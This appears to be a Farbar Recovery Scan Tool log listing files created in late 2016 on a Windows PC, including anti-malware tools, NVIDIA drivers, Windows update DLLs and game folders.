2016-12-02 23:30 - 2016-12-02 23:30 - 03910208 _____ C:\Users\Patrick\Desktop\AdwCleaner_6.030.exe
2016-12-02 23:17 - 2016-12-02 23:44 - 00000549 _____ C:\Users\Patrick\Desktop\JRT.txt
2016-12-02 23:15 - 2016-12-02 23:15 - 01631928 _____ (Malwarebytes) C:\Users\Patrick\Desktop\JRT.exe
2016-12-02 23:06 - 2016-12-03 02:33 - 00000000 ____D C:\AdwCleaner
2016-12-02 21:06 - 2016-12-02 21:07 - 00273260 _____ C:\TDSSKiller.3.1.0.12_02.12.2016_21.06.44_log.txt
2016-12-02 20:53 - 2016-12-02 20:56 - 00800322 _____ C:\TDSSKiller.3.1.0.12_02.12.2016_20.53.28_log.txt
2016-12-02 20:48 - 2016-12-02 20:51 - 00273260 _____ C:\TDSSKiller.3.1.0.12_02.12.2016_20.48.35_log.txt
2016-12-02 20:48 - 2016-12-02 20:48 - 04747704 _____ (AO Kaspersky Lab) C:\Users\Patrick\Desktop\tdsskiller.exe
2016-12-02 20:39 - 2016-12-02 20:47 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-12-02 20:39 - 2016-12-02 20:39 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-12-02 20:39 - 2016-12-02 20:39 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-12-02 20:38 - 2016-12-03 19:38 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-12-02 20:38 - 2016-12-02 20:47 - 00000000 ____D C:\Users\Patrick\Desktop\mbar
2016-12-02 20:38 - 2016-12-02 20:38 - 16563352 _____ (Malwarebytes Corp.) C:\Users\Patrick\Desktop\mbar-1.09.3.1001.exe
2016-12-02 07:17 - 2016-12-02 07:17 - 00000230 _____ C:\Users\Patrick\Desktop\Sid Meier's Civilization V (DirectX 11).url
2016-12-01 20:35 - 2016-12-01 20:35 - 00000000 ____D C:\Users\Patrick\AppData\Local\My Games
2016-11-30 18:45 - 2016-12-05 17:10 - 00019253 _____ C:\Users\Patrick\Desktop\FRST.txt
2016-11-30 18:45 - 2016-12-03 19:43 - 00070081 _____ C:\Users\Patrick\Desktop\Addition.txt
2016-11-30 18:44 - 2016-12-05 17:10 - 00000000 ____D C:\FRST
2016-11-30 18:33 - 2016-12-05 17:10 - 02419200 _____ (Farbar) C:\Users\Patrick\Desktop\FRST64.exe
2016-11-29 06:10 - 2016-11-29 06:10 - 00000222 _____ C:\Users\Patrick\Desktop\Death Road to Canada.url
2016-11-28 20:20 - 2016-10-19 21:13 - 00453382 ____R C:\WINDOWS\system32\Drivers\etc\hosts.20161128-202029.backup
2016-11-27 15:18 - 2016-11-27 15:18 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\.madgarden
2016-11-26 17:07 - 2016-11-26 17:07 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\NVIDIA
2016-11-26 17:07 - 2016-11-26 17:07 - 00000000 ____D C:\Users\Patrick\AppData\Local\Uber Entertainment
2016-11-26 17:06 - 2016-11-26 17:06 - 00003484 _____ C:\WINDOWS\System32\Tasks\IntelMemoryDiagnostic
2016-11-26 01:53 - 2016-11-26 01:53 - 00000000 ____D C:\Users\Patrick\.prefs
2016-11-26 01:52 - 2016-11-26 01:52 - 00097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-11-26 01:52 - 2016-11-26 01:52 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\Sun
2016-11-26 01:52 - 2016-11-26 01:52 - 00000000 ____D C:\Users\Patrick\AppData\LocalLow\Sun
2016-11-26 01:52 - 2016-11-26 01:52 - 00000000 ____D C:\ProgramData\Oracle
2016-11-26 01:52 - 2016-11-26 01:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-11-26 01:52 - 2016-11-26 01:52 - 00000000 ____D C:\Program Files (x86)\Java
2016-11-24 20:49 - 2016-11-24 20:49 - 00000000 ____D C:\Users\Patrick\Neuer Ordner
2016-11-24 18:24 - 2016-11-24 18:24 - 00002162 _____ C:\Users\Public\Desktop\SDFormatter.lnk
2016-11-24 18:24 - 2016-11-24 18:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SDFormatter
2016-11-24 18:24 - 2016-11-24 18:24 - 00000000 ____D C:\Program Files (x86)\SDA
2016-11-24 18:23 - 2016-11-24 18:23 - 00000000 ____D C:\Users\Patrick\AppData\Local\Downloaded Installations
2016-11-23 23:18 - 2016-11-23 23:38 - 00000000 ____D C:\Users\Patrick\AppData\Local\PWU_ep2
2016-11-23 21:47 - 2016-11-23 21:47 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\rockbox.org
2016-11-23 20:38 - 2016-11-23 20:38 - 00463404 _____ C:\WINDOWS\Minidump\112316-5875-01.dmp
2016-11-23 20:17 - 2016-11-23 20:38 - 714201435 _____ C:\WINDOWS\MEMORY.DMP
2016-11-23 20:17 - 2016-11-23 20:38 - 00000000 ____D C:\WINDOWS\Minidump
2016-11-23 20:17 - 2016-11-23 20:17 - 00588292 _____ C:\WINDOWS\Minidump\112316-6265-01.dmp
2016-11-21 22:51 - 2016-11-21 22:59 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\α-MODEL
2016-11-20 03:11 - 2016-11-20 03:11 - 00000000 ____D C:\Users\Patrick\Documents\Сохранения игр Quest Navigator
2016-11-19 03:15 - 2016-11-19 03:15 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2016-11-19 03:15 - 2016-11-17 02:03 - 06384576 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2016-11-19 03:15 - 2016-11-17 02:03 - 02477624 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2016-11-19 03:15 - 2016-11-17 02:03 - 01762752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2016-11-19 03:15 - 2016-11-17 02:03 - 00546752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2016-11-19 03:15 - 2016-11-17 02:03 - 00392128 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2016-11-19 03:15 - 2016-11-17 02:03 - 00083512 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2016-11-19 03:15 - 2016-11-17 02:03 - 00069568 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2016-11-19 03:15 - 2016-11-16 10:52 - 07529957 _____ C:\WINDOWS\system32\nvcoproc.bin
2016-11-19 03:15 - 2016-09-09 19:25 - 00269600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2016-11-19 03:15 - 2016-09-09 19:25 - 00261920 _____ C:\WINDOWS\system32\vulkan-1.dll
2016-11-19 03:15 - 2016-09-09 19:25 - 00110880 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2016-11-19 03:15 - 2016-09-09 19:24 - 00125216 _____ C:\WINDOWS\system32\vulkaninfo.exe
2016-11-19 03:14 - 2016-11-17 01:58 - 00001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2016-11-19 03:13 - 2016-11-18 00:09 - 00048688 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvpciflt.sys
2016-11-19 03:13 - 2016-11-17 03:06 - 40123840 _____ C:\WINDOWS\system32\nvcompiler.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 35224632 _____ C:\WINDOWS\SysWOW64\nvcompiler.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 34711096 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 28203576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 10912232 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 10803880 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 10354800 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 09158432 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 08913328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 08761376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 03934504 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 03474064 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 02953152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 02586048 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 01953336 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6437595.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 01585088 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6437595.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 01038904 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00975296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00943552 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00897080 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00802768 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00683640 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00644112 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00572888 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00438208 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00394888 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00390200 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00327408 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00042296 _____ C:\WINDOWS\system32\nvinfo.pb
2016-11-19 03:13 - 2016-11-17 03:06 - 00000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2016-11-19 03:13 - 2016-11-17 03:06 - 00000669 _____ C:\WINDOWS\system32\nv-vk64.json
2016-11-19 03:02 - 2005-01-22 01:53 - 00055296 _____ C:\WINDOWS\system32\huffyuv.dll
2016-11-18 22:48 - 2016-11-18 22:48 - 00001067 _____ C:\Users\Public\Desktop\HiSuite.lnk
2016-11-18 22:48 - 2016-11-18 22:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HiSuite
2016-11-18 22:48 - 2016-11-18 22:48 - 00000000 ____D C:\Program Files (x86)\HiSuite
2016-11-18 14:42 - 2016-11-18 14:42 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2016-11-18 14:42 - 2016-10-25 21:21 - 00106040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2016-11-18 14:42 - 2016-10-25 21:21 - 00095800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2016-11-16 06:45 - 2016-12-05 17:09 - 00000000 ____D C:\Users\Patrick\AppData\LocalLow\Mozilla
2016-11-13 23:20 - 2016-11-13 23:20 - 00000000 ____D C:\ProgramData\Adventure Game Studio
2016-11-10 06:45 - 2016-11-02 12:09 - 02257104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-11-10 06:45 - 2016-11-02 12:04 - 00596832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2016-11-10 06:45 - 2016-11-02 12:01 - 01425000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d9.dll
2016-11-10 06:45 - 2016-11-02 12:01 - 01263856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-11-10 06:45 - 2016-11-02 12:01 - 00276832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\input.dll
2016-11-10 06:45 - 2016-11-02 11:48 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSpkg.dll
2016-11-10 06:45 - 2016-11-02 11:46 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-11-10 06:45 - 2016-11-02 11:43 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d8.dll
2016-11-10 06:45 - 2016-11-02 11:42 - 00632832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sud.dll
2016-11-10 06:45 - 2016-11-02 11:42 - 00549376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActionCenterCPL.dll
2016-11-10 06:45 - 2016-11-02 11:42 - 00506880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2016-11-10 06:45 - 2016-11-02 11:42 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-11-10 06:45 - 2016-11-02 11:40 - 00548352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ddraw.dll
2016-11-10 06:45 - 2016-11-02 11:31 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2016-11-10 06:45 - 2016-11-02 11:31 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-11-10 06:45 - 2016-11-02 11:29 - 07469056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-11-10 06:45 - 2016-11-02 11:29 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2016-11-10 06:45 - 2016-11-02 11:28 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-11-10 06:45 - 2016-11-02 11:27 - 02458112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themecpl.dll
2016-11-10 06:45 - 2016-11-02 11:27 - 00580608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hgcpl.dll
2016-11-10 06:45 - 2016-11-02 11:26 - 01595392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-11-10 06:45 - 2016-11-02 11:26 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2016-11-10 06:45 - 2016-11-02 11:26 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\stobject.dll
2016-11-10 06:45 - 2016-11-02 11:25 - 02256384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-11-10 06:44 - 2016-11-02 12:22 - 01570672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-11-10 06:44 - 2016-11-02 12:22 - 00601712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2016-11-10 06:44 - 2016-11-02 12:12 - 00341344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-11-10 06:44 - 2016-11-02 12:08 - 00602464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-11-10 06:44 - 2016-11-02 12:08 - 00111968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll
2016-11-10 06:44 - 2016-11-02 12:05 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-11-10 06:44 - 2016-11-02 12:05 - 06657176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-11-10 06:44 - 2016-11-02 12:05 - 03892352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-11-10 06:44 - 2016-11-02 12:05 - 00951904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-11-10 06:44 - 2016-11-02 11:50 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-11-10 06:44 - 2016-11-02 11:49 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2016-11-10 06:44 - 2016-11-02 11:47 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll
2016-11-10 06:44 - 2016-11-02 11:47 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Shell.Search.UriHandler.dll
2016-11-10 06:44 - 2016-11-02 11:45 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll
2016-11-10 06:44 - 2016-11-02 11:45 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll
2016-11-10 06:44 - 2016-11-02 11:44 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-11-10 06:44 - 2016-11-02 11:44 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthExt.dll
2016-11-10 06:44 - 2016-11-02 11:43 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2016-11-10 06:44 - 2016-11-02 11:43 - 00198144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FSClient.dll
2016-11-10 06:44 - 2016-11-02 11:42 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
2016-11-10 06:44 - 2016-11-02 11:42 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2016-11-10 06:44 - 2016-11-02 11:41 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2016-11-10 06:44 - 2016-11-02 11:39 - 00465920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppBroker.dll
2016-11-10 06:44 - 2016-11-02 11:39 - 00348672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\zipfldr.dll
2016-11-10 06:44 - 2016-11-02 11:39 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAnimation.dll
2016-11-10 06:44 - 2016-11-02 11:38 - 00760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2016-11-10 06:44 - 2016-11-02 11:36 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-11-10 06:44 - 2016-11-02 11:35 - 00336896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe
2016-11-10 06:44 - 2016-11-02 11:33 - 12349952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-11-10 06:44 - 2016-11-02 11:33 - 03307520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-11-10 06:44 - 2016-11-02 11:29 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-11-10 06:44 - 2016-11-02 11:29 - 00122368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSM.dll
2016-11-10 06:44 - 2016-11-02 11:28 - 06044160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-11-10 06:44 - 2016-11-02 11:28 - 00807424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.OnlineId.dll
2016-11-10 06:44 - 2016-11-02 11:27 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.dll
2016-11-10 06:44 - 2016-11-02 11:26 - 02747392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
2016-11-10 06:44 - 2016-11-02 11:26 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-11-10 06:44 - 2016-11-02 11:26 - 00912896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2016-11-10 06:44 - 2016-11-02 11:26 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2016-11-10 06:44 - 2016-11-02 11:26 - 00712192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll
2016-11-10 06:44 - 2016-11-02 11:25 - 02998272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2016-11-10 06:44 - 2016-11-02 11:25 - 01556480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2016-11-10 06:44 - 2016-11-02 11:25 - 00772608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntshrui.dll
2016-11-10 06:44 - 2016-11-02 11:23 - 03106304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2016-11-10 06:44 - 2016-11-02 11:23 - 02356736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVidCtl.dll
2016-11-10 06:44 - 2016-08-02 05:30 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-11-10 06:43 - 2016-11-02 13:01 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2016-11-10 06:43 - 2016-11-02 13:01 - 00315744 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-11-10 06:43 - 2016-11-02 12:10 - 02323728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2016-11-10 06:43 - 2016-11-02 12:08 - 00576408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-11-10 06:43 - 2016-11-02 12:08 - 00186424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\weretw.dll
2016-11-10 06:43 - 2016-11-02 12:05 - 00959112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-11-10 06:43 - 2016-11-02 12:04 - 04312248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-11-10 06:43 - 2016-11-02 12:01 - 01415744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2016-11-10 06:43 - 2016-11-02 12:01 - 00545936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-11-10 06:43 - 2016-11-02 11:49 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-11-10 06:43 - 2016-11-02 11:48 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2016-11-10 06:43 - 2016-11-02 11:48 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efsext.dll
2016-11-10 06:43 - 2016-11-02 11:47 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll
2016-11-10 06:43 - 2016-11-02 11:46 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppCapture.dll
2016-11-10 06:43 - 2016-11-02 11:45 - 00492032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2016-11-10 06:43 - 2016-11-02 11:44 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2016-11-10 06:43 - 2016-11-02 11:43 - 00270336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2016-11-10 06:43 - 2016-11-02 11:43 - 00126464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2016-11-10 06:43 - 2016-11-02 11:42 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll
2016-11-10 06:43 - 2016-11-02 11:40 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontext.dll
2016-11-10 06:43 - 2016-11-02 11:40 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2016-11-10 06:43 - 2016-11-02 11:37 - 19415040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-11-10 06:43 - 2016-11-02 11:36 - 19415552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-11-10 06:43 - 2016-11-02 11:36 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ErrorDetailsUpdate.dll
2016-11-10 06:43 - 2016-11-02 11:31 - 03196416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2016-11-10 06:43 - 2016-11-02 11:30 - 12175360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-11-10 06:43 - 2016-11-02 11:30 - 00134144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ErrorDetails.dll
2016-11-10 06:43 - 2016-11-02 11:29 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2016-11-10 06:43 - 2016-11-02 11:28 - 04423680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-11-10 06:43 - 2016-11-02 11:28 - 00109568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\chartv.dll
2016-11-10 06:43 - 2016-11-02 11:26 - 02484736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gameux.dll
2016-11-10 06:43 - 2016-11-02 11:23 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GlobCollationHost.dll
2016-11-10 06:43 - 2016-11-02 10:11 - 00788624 _____ C:\WINDOWS\SysWOW64\locale.nls
2016-11-10 06:43 - 2016-11-02 10:11 - 00788624 _____ C:\WINDOWS\system32\locale.nls
2016-11-10 06:36 - 2016-11-02 12:14 - 07816544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-11-10 06:36 - 2016-11-02 12:13 - 01883784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-11-10 06:36 - 2016-11-02 12:13 - 00773720 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2016-11-10 06:36 - 2016-11-02 12:13 - 00423776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifitask.exe
2016-11-10 06:36 - 2016-11-02 12:12 - 02255712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-11-10 06:36 - 2016-11-02 12:05 - 00405856 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-11-10 06:36 - 2016-11-02 12:01 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-11-10 06:36 - 2016-11-02 12:00 - 22223968 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-11-10 06:36 - 2016-11-02 12:00 - 08156080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-11-10 06:36 - 2016-11-02 11:56 - 01418312 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-11-10 06:36 - 2016-11-02 11:56 - 00322912 _____ (Microsoft Corporation) C:\WINDOWS\system32\input.dll
2016-11-10 06:36 - 2016-11-02 11:34 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-11-10 06:36 - 2016-11-02 11:34 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-11-10 06:36 - 2016-11-02 11:33 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-11-10 06:36 - 2016-11-02 11:31 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSpkg.dll
2016-11-10 06:36 - 2016-11-02 11:30 - 09131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-11-10 06:36 - 2016-11-02 11:30 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
2016-11-10 06:36 - 2016-11-02 11:30 - 00321536 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
